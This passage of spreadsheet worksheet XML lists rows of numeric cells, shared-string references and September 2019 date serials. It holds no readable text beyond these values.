      <c r="A10384">
        <f t="shared" si="162"/>
        <v>10383</v>
      </c>
      <c r="B10384">
        <v>383</v>
      </c>
      <c r="C10384" t="s">
        <v>19637</v>
      </c>
      <c r="D10384" s="1">
        <v>43711</v>
      </c>
      <c r="E10384" t="s">
        <v>19640</v>
      </c>
      <c r="F10384" t="s">
        <v>10021</v>
      </c>
      <c r="G10384" t="s">
        <v>20144</v>
      </c>
    </row>
    <row r="10385" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10385">
        <f t="shared" si="162"/>
        <v>10384</v>
      </c>
      <c r="B10385">
        <v>384</v>
      </c>
      <c r="C10385" t="s">
        <v>19637</v>
      </c>
      <c r="D10385" s="1">
        <v>43736</v>
      </c>
      <c r="E10385" t="s">
        <v>19680</v>
      </c>
      <c r="F10385" t="s">
        <v>10021</v>
      </c>
      <c r="G10385" t="s">
        <v>20145</v>
      </c>
    </row>
    <row r="10386" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10386">
        <f t="shared" si="162"/>
        <v>10385</v>
      </c>
      <c r="B10386">
        <v>385</v>
      </c>
      <c r="C10386" t="s">
        <v>19637</v>
      </c>
      <c r="D10386" s="1">
        <v>43734</v>
      </c>
      <c r="F10386" t="s">
        <v>10526</v>
      </c>
      <c r="G10386" t="s">
        <v>20146</v>
      </c>
    </row>
    <row r="10387" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10387">
        <f t="shared" si="162"/>
        <v>10386</v>
      </c>
      <c r="B10387">
        <v>386</v>
      </c>
      <c r="C10387" t="s">
        <v>19637</v>
      </c>
      <c r="D10387" s="1">
        <v>43726</v>
      </c>
      <c r="E10387" t="s">
        <v>19680</v>
      </c>
      <c r="F10387" t="s">
        <v>10021</v>
      </c>
      <c r="G10387" t="s">
        <v>20147</v>
      </c>
    </row>
    <row r="10388" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10388">
        <f t="shared" si="162"/>
        <v>10387</v>
      </c>
      <c r="B10388">
        <v>387</v>
      </c>
      <c r="C10388" t="s">
        <v>19637</v>
      </c>
      <c r="D10388" s="1">
        <v>43715</v>
      </c>
      <c r="E10388" t="s">
        <v>19640</v>
      </c>
      <c r="F10388" t="s">
        <v>9975</v>
      </c>
      <c r="G10388" t="s">
        <v>20148</v>
      </c>
    </row>
    <row r="10389" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10389">
        <f t="shared" si="162"/>
        <v>10388</v>
      </c>
      <c r="B10389">
        <v>388</v>
      </c>
      <c r="C10389" t="s">
        <v>19637</v>
      </c>
      <c r="D10389" s="1">
        <v>43726</v>
      </c>
      <c r="E10389" t="s">
        <v>19750</v>
      </c>
      <c r="F10389" t="s">
        <v>9978</v>
      </c>
      <c r="G10389" t="s">
        <v>20149</v>
      </c>
    </row>
    <row r="10390" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10390">
        <f t="shared" si="162"/>
        <v>10389</v>
      </c>
      <c r="B10390">
        <v>389</v>
      </c>
      <c r="C10390" t="s">
        <v>19637</v>
      </c>
      <c r="D10390" s="1">
        <v>43726</v>
      </c>
      <c r="E10390" t="s">
        <v>19640</v>
      </c>
      <c r="F10390" t="s">
        <v>9975</v>
      </c>
      <c r="G10390" t="s">
        <v>20150</v>
      </c>
    </row>
    <row r="10391" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10391">
        <f t="shared" si="162"/>
        <v>10390</v>
      </c>
      <c r="B10391">
        <v>390</v>
      </c>
      <c r="C10391" t="s">
        <v>19637</v>
      </c>
      <c r="D10391" s="1">
        <v>43714</v>
      </c>
      <c r="F10391" t="s">
        <v>10526</v>
      </c>
      <c r="G10391" t="s">
        <v>20151</v>
      </c>
    </row>
    <row r="10392" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10392">
        <f t="shared" si="162"/>
        <v>10391</v>
      </c>
      <c r="B10392">
        <v>391</v>
      </c>
      <c r="C10392" t="s">
        <v>19637</v>
      </c>
      <c r="D10392" s="1">
        <v>43715</v>
      </c>
      <c r="F10392" t="s">
        <v>10526</v>
      </c>
      <c r="G10392" t="s">
        <v>20152</v>
      </c>
    </row>
    <row r="10393" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10393">
        <f t="shared" si="162"/>
        <v>10392</v>
      </c>
      <c r="B10393">
        <v>392</v>
      </c>
      <c r="C10393" t="s">
        <v>19637</v>
      </c>
      <c r="D10393" s="1">
        <v>43724</v>
      </c>
      <c r="F10393" t="s">
        <v>10526</v>
      </c>
      <c r="G10393" t="s">
        <v>20153</v>
      </c>
    </row>
    <row r="10394" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10394">
        <f t="shared" si="162"/>
        <v>10393</v>
      </c>
      <c r="B10394">
        <v>393</v>
      </c>
      <c r="C10394" t="s">
        <v>19637</v>
      </c>
      <c r="D10394" s="1">
        <v>43720</v>
      </c>
      <c r="E10394" t="s">
        <v>20154</v>
      </c>
      <c r="F10394" t="s">
        <v>10526</v>
      </c>
      <c r="G10394" t="s">
        <v>20155</v>
      </c>
    </row>
    <row r="10395" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10395">
        <f t="shared" si="162"/>
        <v>10394</v>
      </c>
      <c r="B10395">
        <v>394</v>
      </c>
      <c r="C10395" t="s">
        <v>19637</v>
      </c>
      <c r="D10395" s="1">
        <v>43730</v>
      </c>
      <c r="F10395" t="s">
        <v>10526</v>
      </c>
      <c r="G10395" t="s">
        <v>20156</v>
      </c>
    </row>
    <row r="10396" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10396">
        <f t="shared" si="162"/>
        <v>10395</v>
      </c>
      <c r="B10396">
        <v>395</v>
      </c>
      <c r="C10396" t="s">
        <v>19637</v>
      </c>
      <c r="D10396" s="1">
        <v>43712</v>
      </c>
      <c r="F10396" t="s">
        <v>10526</v>
      </c>
      <c r="G10396" t="s">
        <v>20157</v>
      </c>
    </row>
    <row r="10397" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10397">
        <f t="shared" si="162"/>
        <v>10396</v>
      </c>
      <c r="B10397">
        <v>396</v>
      </c>
      <c r="C10397" t="s">
        <v>19637</v>
      </c>
      <c r="D10397" s="1">
        <v>43720</v>
      </c>
      <c r="E10397" t="s">
        <v>20158</v>
      </c>
      <c r="F10397" t="s">
        <v>10526</v>
      </c>
      <c r="G10397" t="s">
        <v>20159</v>
      </c>
    </row>
    <row r="10398" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10398">
        <f t="shared" si="162"/>
        <v>10397</v>
      </c>
      <c r="B10398">
        <v>397</v>
      </c>
      <c r="C10398" t="s">
        <v>19637</v>
      </c>
      <c r="D10398" s="1">
        <v>43720</v>
      </c>
      <c r="E10398" t="s">
        <v>20160</v>
      </c>
      <c r="F10398" t="s">
        <v>10526</v>
      </c>
      <c r="G10398" t="s">
        <v>20161</v>
      </c>
    </row>
    <row r="10399" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10399">
        <f t="shared" si="162"/>
        <v>10398</v>
      </c>
      <c r="B10399">
        <v>398</v>
      </c>
      <c r="C10399" t="s">
        <v>19637</v>
      </c>
      <c r="D10399" s="1">
        <v>43714</v>
      </c>
      <c r="E10399" t="s">
        <v>19849</v>
      </c>
      <c r="F10399" t="s">
        <v>10021</v>
      </c>
      <c r="G10399" t="s">
        <v>20162</v>
      </c>
    </row>
    <row r="10400" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10400">
        <f t="shared" si="162"/>
        <v>10399</v>
      </c>
      <c r="B10400">
        <v>399</v>
      </c>
      <c r="C10400" t="s">
        <v>19637</v>
      </c>
      <c r="D10400" s="1">
        <v>43737</v>
      </c>
      <c r="E10400" t="s">
        <v>19917</v>
      </c>
      <c r="F10400" t="s">
        <v>9975</v>
      </c>
      <c r="G10400" t="s">
        <v>20163</v>
      </c>
    </row>
    <row r="10401" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10401">
        <f t="shared" si="162"/>
        <v>10400</v>
      </c>
      <c r="B10401">
        <v>400</v>
      </c>
      <c r="C10401" t="s">
        <v>19637</v>
      </c>
      <c r="D10401" s="1">
        <v>43737</v>
      </c>
      <c r="E10401" t="s">
        <v>20164</v>
      </c>
      <c r="F10401" t="s">
        <v>10526</v>
      </c>
      <c r="G10401" t="s">
        <v>20165</v>
      </c>
    </row>
    <row r="10402" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10402">
        <f t="shared" si="162"/>
        <v>10401</v>
      </c>
      <c r="B10402">
        <v>401</v>
      </c>
      <c r="C10402" t="s">
        <v>19637</v>
      </c>
      <c r="D10402" s="1">
        <v>43737</v>
      </c>
      <c r="F10402" t="s">
        <v>10526</v>
      </c>
      <c r="G10402" t="s">
        <v>20166</v>
      </c>
    </row>
    <row r="10403" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10403">
        <f t="shared" si="162"/>
        <v>10402</v>
      </c>
      <c r="B10403">
        <v>402</v>
      </c>
      <c r="C10403" t="s">
        <v>19637</v>
      </c>
      <c r="D10403" s="1">
        <v>43728</v>
      </c>
      <c r="E10403" t="s">
        <v>20167</v>
      </c>
      <c r="F10403" t="s">
        <v>10526</v>
      </c>
      <c r="G10403" t="s">
        <v>20168</v>
      </c>
    </row>
    <row r="10404" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10404">
        <f t="shared" si="162"/>
        <v>10403</v>
      </c>
      <c r="B10404">
        <v>403</v>
      </c>
      <c r="C10404" t="s">
        <v>19637</v>
      </c>
      <c r="D10404" s="1">
        <v>43717</v>
      </c>
      <c r="E10404" t="s">
        <v>20169</v>
      </c>
      <c r="F10404" t="s">
        <v>10021</v>
      </c>
      <c r="G10404" t="s">
        <v>20170</v>
      </c>
    </row>
    <row r="10405" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10405">
        <f t="shared" si="162"/>
        <v>10404</v>
      </c>
      <c r="B10405">
        <v>404</v>
      </c>
      <c r="C10405" t="s">
        <v>19637</v>
      </c>
      <c r="D10405" s="1">
        <v>43735</v>
      </c>
      <c r="E10405" t="s">
        <v>20171</v>
      </c>
      <c r="F10405" t="s">
        <v>10021</v>
      </c>
      <c r="G10405" t="s">
        <v>20172</v>
      </c>
    </row>
    <row r="10406" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10406">
        <f t="shared" si="162"/>
        <v>10405</v>
      </c>
      <c r="B10406">
        <v>405</v>
      </c>
      <c r="C10406" t="s">
        <v>19637</v>
      </c>
      <c r="D10406" s="1">
        <v>43729</v>
      </c>
      <c r="E10406" t="s">
        <v>20173</v>
      </c>
      <c r="F10406" t="s">
        <v>10526</v>
      </c>
      <c r="G10406" t="s">
        <v>20174</v>
      </c>
    </row>
    <row r="10407" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10407">
        <f t="shared" si="162"/>
        <v>10406</v>
      </c>
      <c r="B10407">
        <v>406</v>
      </c>
      <c r="C10407" t="s">
        <v>19637</v>
      </c>
      <c r="D10407" s="1">
        <v>43738</v>
      </c>
      <c r="E10407" t="s">
        <v>20175</v>
      </c>
      <c r="F10407" t="s">
        <v>10526</v>
      </c>
      <c r="G10407" t="s">
        <v>20176</v>
      </c>
    </row>
    <row r="10408" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10408">
        <f t="shared" si="162"/>
        <v>10407</v>
      </c>
      <c r="B10408">
        <v>407</v>
      </c>
      <c r="C10408" t="s">
        <v>19637</v>
      </c>
      <c r="D10408" s="1">
        <v>43718</v>
      </c>
      <c r="F10408" t="s">
        <v>10526</v>
      </c>
      <c r="G10408" t="s">
        <v>20177</v>
      </c>
    </row>
    <row r="10409" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10409">
        <f t="shared" si="162"/>
        <v>10408</v>
      </c>
      <c r="B10409">
        <v>408</v>
      </c>
      <c r="C10409" t="s">
        <v>19637</v>
      </c>
      <c r="D10409" s="1">
        <v>43723</v>
      </c>
      <c r="E10409" t="s">
        <v>19640</v>
      </c>
      <c r="F10409" t="s">
        <v>9975</v>
      </c>
      <c r="G10409" t="s">
        <v>20178</v>
      </c>
    </row>
    <row r="10410" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10410">
        <f t="shared" si="162"/>
        <v>10409</v>
      </c>
      <c r="B10410">
        <v>409</v>
      </c>
      <c r="C10410" t="s">
        <v>19637</v>
      </c>
      <c r="D10410" s="1">
        <v>43709</v>
      </c>
      <c r="E10410" t="s">
        <v>20179</v>
      </c>
      <c r="F10410" t="s">
        <v>10526</v>
      </c>
      <c r="G10410" t="s">
        <v>20180</v>
      </c>
    </row>
    <row r="10411" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10411">
        <f t="shared" si="162"/>
        <v>10410</v>
      </c>
      <c r="B10411">
        <v>410</v>
      </c>
      <c r="C10411" t="s">
        <v>19637</v>
      </c>
      <c r="D10411" s="1">
        <v>43712</v>
      </c>
      <c r="F10411" t="s">
        <v>10526</v>
      </c>
      <c r="G10411" t="s">
        <v>20181</v>
      </c>
    </row>
    <row r="10412" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10412">
        <f t="shared" si="162"/>
        <v>10411</v>
      </c>
      <c r="B10412">
        <v>411</v>
      </c>
      <c r="C10412" t="s">
        <v>19637</v>
      </c>
      <c r="D10412" s="1">
        <v>43710</v>
      </c>
      <c r="E10412" t="s">
        <v>20182</v>
      </c>
      <c r="F10412" t="s">
        <v>10021</v>
      </c>
      <c r="G10412" t="s">
        <v>20183</v>
      </c>
    </row>
    <row r="10413" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10413">
        <f t="shared" si="162"/>
        <v>10412</v>
      </c>
      <c r="B10413">
        <v>412</v>
      </c>
      <c r="C10413" t="s">
        <v>19637</v>
      </c>
      <c r="D10413" s="1">
        <v>43719</v>
      </c>
      <c r="E10413" t="s">
        <v>19640</v>
      </c>
      <c r="F10413" t="s">
        <v>9975</v>
      </c>
      <c r="G10413" t="s">
        <v>20184</v>
      </c>
    </row>
    <row r="10414" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10414">
        <f t="shared" si="162"/>
        <v>10413</v>
      </c>
      <c r="B10414">
        <v>413</v>
      </c>
      <c r="C10414" t="s">
        <v>19637</v>
      </c>
      <c r="D10414" s="1">
        <v>43722</v>
      </c>
      <c r="E10414" t="s">
        <v>20185</v>
      </c>
      <c r="F10414" t="s">
        <v>9975</v>
      </c>
      <c r="G10414" t="s">
        <v>20186</v>
      </c>
    </row>
    <row r="10415" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10415">
        <f t="shared" si="162"/>
        <v>10414</v>
      </c>
      <c r="B10415">
        <v>414</v>
      </c>
      <c r="C10415" t="s">
        <v>19637</v>
      </c>
      <c r="D10415" s="1">
        <v>43712</v>
      </c>
      <c r="E10415" t="s">
        <v>20187</v>
      </c>
      <c r="F10415" t="s">
        <v>9975</v>
      </c>
      <c r="G10415" t="s">
        <v>20188</v>
      </c>
    </row>
    <row r="10416" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10416">
        <f t="shared" si="162"/>
        <v>10415</v>
      </c>
      <c r="B10416">
        <v>415</v>
      </c>
      <c r="C10416" t="s">
        <v>19637</v>
      </c>
      <c r="D10416" s="1">
        <v>43716</v>
      </c>
      <c r="E10416" t="s">
        <v>19917</v>
      </c>
      <c r="F10416" t="s">
        <v>9975</v>
      </c>
      <c r="G10416" t="s">
        <v>20189</v>
      </c>
    </row>
    <row r="10417" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10417">
        <f t="shared" si="162"/>
        <v>10416</v>
      </c>
      <c r="B10417">
        <v>416</v>
      </c>
      <c r="C10417" t="s">
        <v>19637</v>
      </c>
      <c r="D10417" s="1">
        <v>43716</v>
      </c>
      <c r="E10417" t="s">
        <v>19834</v>
      </c>
      <c r="F10417" t="s">
        <v>10526</v>
      </c>
      <c r="G10417" t="s">
        <v>20190</v>
      </c>
    </row>
    <row r="10418" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10418">
        <f t="shared" si="162"/>
        <v>10417</v>
      </c>
      <c r="B10418">
        <v>417</v>
      </c>
      <c r="C10418" t="s">
        <v>19637</v>
      </c>
      <c r="D10418" s="1">
        <v>43711</v>
      </c>
      <c r="E10418" t="s">
        <v>20191</v>
      </c>
      <c r="F10418" t="s">
        <v>10021</v>
      </c>
      <c r="G10418" t="s">
        <v>20192</v>
      </c>
    </row>
    <row r="10419" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10419">
        <f t="shared" si="162"/>
        <v>10418</v>
      </c>
      <c r="B10419">
        <v>418</v>
      </c>
      <c r="C10419" t="s">
        <v>19637</v>
      </c>
      <c r="D10419" s="1">
        <v>43719</v>
      </c>
      <c r="E10419" t="s">
        <v>19640</v>
      </c>
      <c r="F10419" t="s">
        <v>10526</v>
      </c>
      <c r="G10419" t="s">
        <v>20193</v>
      </c>
    </row>
    <row r="10420" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10420">
        <f t="shared" si="162"/>
        <v>10419</v>
      </c>
      <c r="B10420">
        <v>419</v>
      </c>
      <c r="C10420" t="s">
        <v>19637</v>
      </c>
      <c r="D10420" s="1">
        <v>43726</v>
      </c>
      <c r="E10420" t="s">
        <v>20194</v>
      </c>
      <c r="F10420" t="s">
        <v>10526</v>
      </c>
      <c r="G10420" t="s">
        <v>20195</v>
      </c>
    </row>
    <row r="10421" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10421">
        <f t="shared" si="162"/>
        <v>10420</v>
      </c>
      <c r="B10421">
        <v>420</v>
      </c>
      <c r="C10421" t="s">
        <v>19637</v>
      </c>
      <c r="D10421" s="1">
        <v>43713</v>
      </c>
      <c r="E10421" t="s">
        <v>19810</v>
      </c>
      <c r="F10421" t="s">
        <v>10526</v>
      </c>
      <c r="G10421" t="s">
        <v>20196</v>
      </c>
    </row>
    <row r="10422" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10422">
        <f t="shared" si="162"/>
        <v>10421</v>
      </c>
      <c r="B10422">
        <v>421</v>
      </c>
      <c r="C10422" t="s">
        <v>19637</v>
      </c>
      <c r="D10422" s="1">
        <v>43738</v>
      </c>
      <c r="E10422" t="s">
        <v>19690</v>
      </c>
      <c r="F10422" t="s">
        <v>9978</v>
      </c>
      <c r="G10422" t="s">
        <v>20197</v>
      </c>
    </row>
    <row r="10423" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10423">
        <f t="shared" si="162"/>
        <v>10422</v>
      </c>
      <c r="B10423">
        <v>422</v>
      </c>
      <c r="C10423" t="s">
        <v>19637</v>
      </c>
      <c r="D10423" s="1">
        <v>43737</v>
      </c>
      <c r="E10423" t="s">
        <v>20198</v>
      </c>
      <c r="F10423" t="s">
        <v>10526</v>
      </c>
      <c r="G10423" t="s">
        <v>20199</v>
      </c>
    </row>
    <row r="10424" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10424">
        <f t="shared" si="162"/>
        <v>10423</v>
      </c>
      <c r="B10424">
        <v>423</v>
      </c>
      <c r="C10424" t="s">
        <v>19637</v>
      </c>
      <c r="D10424" s="1">
        <v>43719</v>
      </c>
      <c r="E10424" t="s">
        <v>19705</v>
      </c>
      <c r="F10424" t="s">
        <v>10021</v>
      </c>
      <c r="G10424" t="s">
        <v>20200</v>
      </c>
    </row>
    <row r="10425" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10425">
        <f t="shared" si="162"/>
        <v>10424</v>
      </c>
      <c r="B10425">
        <v>424</v>
      </c>
      <c r="C10425" t="s">
        <v>19637</v>
      </c>
      <c r="D10425" s="1">
        <v>43737</v>
      </c>
      <c r="E10425" t="s">
        <v>19750</v>
      </c>
      <c r="F10425" t="s">
        <v>9978</v>
      </c>
      <c r="G10425" t="s">
        <v>20201</v>
      </c>
    </row>
    <row r="10426" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10426">
        <f t="shared" si="162"/>
        <v>10425</v>
      </c>
      <c r="B10426">
        <v>425</v>
      </c>
      <c r="C10426" t="s">
        <v>19637</v>
      </c>
      <c r="D10426" s="1">
        <v>43718</v>
      </c>
      <c r="E10426" t="s">
        <v>19750</v>
      </c>
      <c r="F10426" t="s">
        <v>9978</v>
      </c>
      <c r="G10426" t="s">
        <v>20202</v>
      </c>
    </row>
    <row r="10427" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10427">
        <f t="shared" si="162"/>
        <v>10426</v>
      </c>
      <c r="B10427">
        <v>426</v>
      </c>
      <c r="C10427" t="s">
        <v>19637</v>
      </c>
      <c r="D10427" s="1">
        <v>43734</v>
      </c>
      <c r="E10427" t="s">
        <v>19640</v>
      </c>
      <c r="F10427" t="s">
        <v>9975</v>
      </c>
      <c r="G10427" t="s">
        <v>20203</v>
      </c>
    </row>
    <row r="10428" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10428">
        <f t="shared" si="162"/>
        <v>10427</v>
      </c>
      <c r="B10428">
        <v>427</v>
      </c>
      <c r="C10428" t="s">
        <v>19637</v>
      </c>
      <c r="D10428" s="1">
        <v>43732</v>
      </c>
      <c r="E10428" t="s">
        <v>19640</v>
      </c>
      <c r="F10428" t="s">
        <v>10526</v>
      </c>
      <c r="G10428" t="s">
        <v>20204</v>
      </c>
    </row>
    <row r="10429" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10429">
        <f t="shared" si="162"/>
        <v>10428</v>
      </c>
      <c r="B10429">
        <v>428</v>
      </c>
      <c r="C10429" t="s">
        <v>19637</v>
      </c>
      <c r="D10429" s="1">
        <v>43726</v>
      </c>
      <c r="E10429" t="s">
        <v>19648</v>
      </c>
      <c r="F10429" t="s">
        <v>10021</v>
      </c>
      <c r="G10429" t="s">
        <v>20205</v>
      </c>
    </row>
    <row r="10430" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10430">
        <f t="shared" si="162"/>
        <v>10429</v>
      </c>
      <c r="B10430">
        <v>429</v>
      </c>
      <c r="C10430" t="s">
        <v>19637</v>
      </c>
      <c r="D10430" s="1">
        <v>43731</v>
      </c>
      <c r="E10430" t="s">
        <v>19902</v>
      </c>
      <c r="F10430" t="s">
        <v>9975</v>
      </c>
      <c r="G10430" t="s">
        <v>20206</v>
      </c>
    </row>
    <row r="10431" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10431">
        <f t="shared" si="162"/>
        <v>10430</v>
      </c>
      <c r="B10431">
        <v>430</v>
      </c>
      <c r="C10431" t="s">
        <v>19637</v>
      </c>
      <c r="D10431" s="1">
        <v>43725</v>
      </c>
      <c r="E10431" t="s">
        <v>19648</v>
      </c>
      <c r="F10431" t="s">
        <v>10021</v>
      </c>
      <c r="G10431" t="s">
        <v>20207</v>
      </c>
    </row>
    <row r="10432" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10432">
        <f t="shared" si="162"/>
        <v>10431</v>
      </c>
      <c r="B10432">
        <v>431</v>
      </c>
      <c r="C10432" t="s">
        <v>19637</v>
      </c>
      <c r="D10432" s="1">
        <v>43709</v>
      </c>
      <c r="E10432" t="s">
        <v>20187</v>
      </c>
      <c r="F10432" t="s">
        <v>9975</v>
      </c>
      <c r="G10432" t="s">
        <v>20208</v>
      </c>
    </row>
    <row r="10433" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10433">
        <f t="shared" si="162"/>
        <v>10432</v>
      </c>
      <c r="B10433">
        <v>432</v>
      </c>
      <c r="C10433" t="s">
        <v>19637</v>
      </c>
      <c r="D10433" s="1">
        <v>43734</v>
      </c>
      <c r="E10433" t="s">
        <v>19650</v>
      </c>
      <c r="F10433" t="s">
        <v>10021</v>
      </c>
      <c r="G10433" t="s">
        <v>20209</v>
      </c>
    </row>
    <row r="10434" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10434">
        <f t="shared" si="162"/>
        <v>10433</v>
      </c>
      <c r="B10434">
        <v>433</v>
      </c>
      <c r="C10434" t="s">
        <v>19637</v>
      </c>
      <c r="D10434" s="1">
        <v>43728</v>
      </c>
      <c r="F10434" t="s">
        <v>10526</v>
      </c>
      <c r="G10434" t="s">
        <v>20210</v>
      </c>
    </row>
    <row r="10435" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10435">
        <f t="shared" ref="A10435:A10498" si="163">+ROW(A10434)</f>
        <v>10434</v>
      </c>
      <c r="B10435">
        <v>434</v>
      </c>
      <c r="C10435" t="s">
        <v>19637</v>
      </c>
      <c r="D10435" s="1">
        <v>43720</v>
      </c>
      <c r="E10435" t="s">
        <v>20211</v>
      </c>
      <c r="F10435" t="s">
        <v>10526</v>
      </c>
      <c r="G10435" t="s">
        <v>20212</v>
      </c>
    </row>
    <row r="10436" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10436">
        <f t="shared" si="163"/>
        <v>10435</v>
      </c>
      <c r="B10436">
        <v>435</v>
      </c>
      <c r="C10436" t="s">
        <v>19637</v>
      </c>
      <c r="D10436" s="1">
        <v>43714</v>
      </c>
      <c r="E10436" t="s">
        <v>19640</v>
      </c>
      <c r="F10436" t="s">
        <v>9975</v>
      </c>
      <c r="G10436" t="s">
        <v>20213</v>
      </c>
    </row>
    <row r="10437" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10437">
        <f t="shared" si="163"/>
        <v>10436</v>
      </c>
      <c r="B10437">
        <v>436</v>
      </c>
      <c r="C10437" t="s">
        <v>19637</v>
      </c>
      <c r="D10437" s="1">
        <v>43724</v>
      </c>
      <c r="E10437" t="s">
        <v>20214</v>
      </c>
      <c r="F10437" t="s">
        <v>9978</v>
      </c>
      <c r="G10437" t="s">
        <v>20215</v>
      </c>
    </row>
    <row r="10438" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10438">
        <f t="shared" si="163"/>
        <v>10437</v>
      </c>
      <c r="B10438">
        <v>437</v>
      </c>
      <c r="C10438" t="s">
        <v>19637</v>
      </c>
      <c r="D10438" s="1">
        <v>43732</v>
      </c>
      <c r="E10438" t="s">
        <v>20194</v>
      </c>
      <c r="F10438" t="s">
        <v>10526</v>
      </c>
      <c r="G10438" t="s">
        <v>20216</v>
      </c>
    </row>
    <row r="10439" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10439">
        <f t="shared" si="163"/>
        <v>10438</v>
      </c>
      <c r="B10439">
        <v>438</v>
      </c>
      <c r="C10439" t="s">
        <v>19637</v>
      </c>
      <c r="D10439" s="1">
        <v>43715</v>
      </c>
      <c r="E10439" t="s">
        <v>19690</v>
      </c>
      <c r="F10439" t="s">
        <v>9978</v>
      </c>
      <c r="G10439" t="s">
        <v>20217</v>
      </c>
    </row>
    <row r="10440" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10440">
        <f t="shared" si="163"/>
        <v>10439</v>
      </c>
      <c r="B10440">
        <v>439</v>
      </c>
      <c r="C10440" t="s">
        <v>19637</v>
      </c>
      <c r="D10440" s="1">
        <v>43713</v>
      </c>
      <c r="E10440" t="s">
        <v>20218</v>
      </c>
      <c r="F10440" t="s">
        <v>10526</v>
      </c>
      <c r="G10440" t="s">
        <v>20219</v>
      </c>
    </row>
    <row r="10441" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10441">
        <f t="shared" si="163"/>
        <v>10440</v>
      </c>
      <c r="B10441">
        <v>440</v>
      </c>
      <c r="C10441" t="s">
        <v>19637</v>
      </c>
      <c r="D10441" s="1">
        <v>43726</v>
      </c>
      <c r="E10441" t="s">
        <v>20220</v>
      </c>
      <c r="F10441" t="s">
        <v>10021</v>
      </c>
      <c r="G10441" t="s">
        <v>20221</v>
      </c>
    </row>
    <row r="10442" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10442">
        <f t="shared" si="163"/>
        <v>10441</v>
      </c>
      <c r="B10442">
        <v>441</v>
      </c>
      <c r="C10442" t="s">
        <v>19637</v>
      </c>
      <c r="D10442" s="1">
        <v>43719</v>
      </c>
      <c r="E10442" t="s">
        <v>20222</v>
      </c>
      <c r="F10442" t="s">
        <v>10526</v>
      </c>
      <c r="G10442" t="s">
        <v>20223</v>
      </c>
    </row>
    <row r="10443" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10443">
        <f t="shared" si="163"/>
        <v>10442</v>
      </c>
      <c r="B10443">
        <v>442</v>
      </c>
      <c r="C10443" t="s">
        <v>19637</v>
      </c>
      <c r="D10443" s="1">
        <v>43718</v>
      </c>
      <c r="E10443" t="s">
        <v>19680</v>
      </c>
      <c r="F10443" t="s">
        <v>10021</v>
      </c>
      <c r="G10443" t="s">
        <v>20224</v>
      </c>
    </row>
    <row r="10444" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10444">
        <f t="shared" si="163"/>
        <v>10443</v>
      </c>
      <c r="B10444">
        <v>443</v>
      </c>
      <c r="C10444" t="s">
        <v>19637</v>
      </c>
      <c r="D10444" s="1">
        <v>43717</v>
      </c>
      <c r="E10444" t="s">
        <v>19640</v>
      </c>
      <c r="F10444" t="s">
        <v>10526</v>
      </c>
      <c r="G10444" t="s">
        <v>20225</v>
      </c>
    </row>
    <row r="10445" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10445">
        <f t="shared" si="163"/>
        <v>10444</v>
      </c>
      <c r="B10445">
        <v>444</v>
      </c>
      <c r="C10445" t="s">
        <v>19637</v>
      </c>
      <c r="D10445" s="1">
        <v>43716</v>
      </c>
      <c r="E10445" t="s">
        <v>20005</v>
      </c>
      <c r="F10445" t="s">
        <v>9975</v>
      </c>
      <c r="G10445" t="s">
        <v>20226</v>
      </c>
    </row>
    <row r="10446" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10446">
        <f t="shared" si="163"/>
        <v>10445</v>
      </c>
      <c r="B10446">
        <v>445</v>
      </c>
      <c r="C10446" t="s">
